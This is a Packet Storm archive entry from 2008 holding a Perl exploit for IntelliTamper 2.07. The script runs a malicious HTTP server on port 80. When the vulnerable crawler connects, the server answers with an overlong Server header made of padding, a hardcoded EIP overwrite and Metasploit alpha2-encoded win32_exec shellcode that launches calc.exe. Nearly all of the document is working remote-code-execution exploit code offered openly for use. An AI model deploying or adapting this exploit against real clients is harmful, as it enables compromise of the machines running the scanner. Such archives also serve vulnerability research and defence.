intellitamper207-exec.txt

2008-07-23T00:00:00
ID PACKETSTORM:68445
Type packetstorm
Reporter koshi
Modified 2008-07-23T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# IntelliTamper 2.07 Remote Code Execution ( server header )  
#  
# By: Koshi  
#  
# Guido Landi finally did it, thought i'd throw one in there.  
# This example assumes you're scanning "http://127.0.0.1"  
# For example, exploit may not work if you were to scan "http://127.0.0.1:80"  
# or even changing it as slightly as "http://127.0.0.1/"  
#  
# gr33tz: Rima my baby, str0ke, messiah, Idol, old venny ;) , BU,  
# and finally, Guido Landi for sparking my interest in exploiting  
# this application.  
#  
#  
  
use IO::Socket;  
  
my $msg="";  
my $overflow = "A"x1536;  
my $fun = "".  
"\xb3\x8d\x95\x7c". # EIP (0x7C958DB3 call esp NTDLL.DLL)  
"z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C". # More buffer.  
"AAAA2Cb3Cb4CBBBB"; # Starts executing here  
  
  
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com  
my $sh3llcode =  
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".  
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63".  
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32".  
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x4b\x59\x59\x6c\x6a".  
"\x48\x70\x44\x35\x50\x65\x50\x73\x30\x6e\x6b\x33\x75\x75\x6c\x4c".  
"\x4b\x71\x6c\x53\x35\x74\x38\x55\x51\x78\x6f\x6e\x6b\x62\x6f\x36".  
"\x78\x6c\x4b\x53\x6f\x65\x70\x36\x61\x6a\x4b\x43\x79\x6e\x6b\x76".  
"\x54\x4e\x6b\x53\x31\x68\x6e\x64\x71\x6f\x30\x5a\x39\x4e\x4c\x6e".  
"\x64\x6f\x30\x71\x64\x75\x57\x78\x41\x38\x4a\x74\x4d\x76\x61\x4f".  
"\x32\x5a\x4b\x39\x64\x75\x6b\x43\x64\x67\x54\x74\x44\x74\x35\x48".  
"\x65\x6c\x4b\x73\x6f\x37\x54\x57\x71\x38\x6b\x70\x66\x6e\x6b\x64".  
"\x4c\x70\x4b\x4e\x6b\x33\x6f\x35\x4c\x64\x41\x38\x6b\x4c\x4b\x37".  
"\x6c\x4c\x4b\x76\x61\x58\x6b\x6c\x49\x43\x6c\x55\x74\x56\x64\x4f".  
"\x33\x44\x71\x4f\x30\x30\x64\x6c\x4b\x77\x30\x74\x70\x6f\x75\x49".  
"\x50\x50\x78\x36\x6c\x4c\x4b\x33\x70\x54\x4c\x6e\x6b\x30\x70\x45".  
"\x4c\x6e\x4d\x4c\x4b\x55\x38\x43\x38\x78\x6b\x44\x49\x6e\x6b\x4b".  
"\x30\x6c\x70\x45\x50\x65\x50\x75\x50\x4c\x4b\x41\x78\x75\x6c\x51".  
"\x4f\x30\x31\x7a\x56\x51\x70\x30\x56\x4f\x79\x38\x78\x6c\x43\x6b".  
"\x70\x71\x6b\x72\x70\x61\x78\x4a\x50\x4d\x5a\x43\x34\x43\x6f\x43".  
"\x58\x4c\x58\x49\x6e\x6c\x4a\x66\x6e\x43\x67\x69\x6f\x48\x67\x43".  
"\x53\x73\x51\x50\x6c\x41\x73\x66\x4e\x70\x65\x72\x58\x71\x75\x37".  
"\x70\x63";  
  
my $overflow2 = "A"x1046;  
my $buff = "$overflow$fun$sh3llcode";  
my $resp = "".  
"HTTP/1.1 200 OK\r\n".  
"Connection: close\r\n".  
"Content-Length: 8\r\n".  
"Date: Mon, 21 Jul 2008 20:47:05 GMT\r\n".  
"Content-Type: text/plain\r\n".  
"Server: $buff\r\n".  
"MIME-Version: 1.0\r\n\r\n".  
"Exploit!\r\n";  
  
my $sock = new IO::Socket::INET (LocalPort => '80', Proto => 'tcp', Listen => 1, Reuse => 1, );  
  
  
print "Listening on port 80 for connections...\n";  
my $new_sock = $sock->accept();  
print "Got connection from client...\n";  
my $sock_addr = recv($new_sock,$msg,190,0);  
print "Sending client packet...\n";  
print $new_sock "$resp";  
print "Packet sent to client, voila?\n";  
close($sock);  
print "Socket closed\n";  
  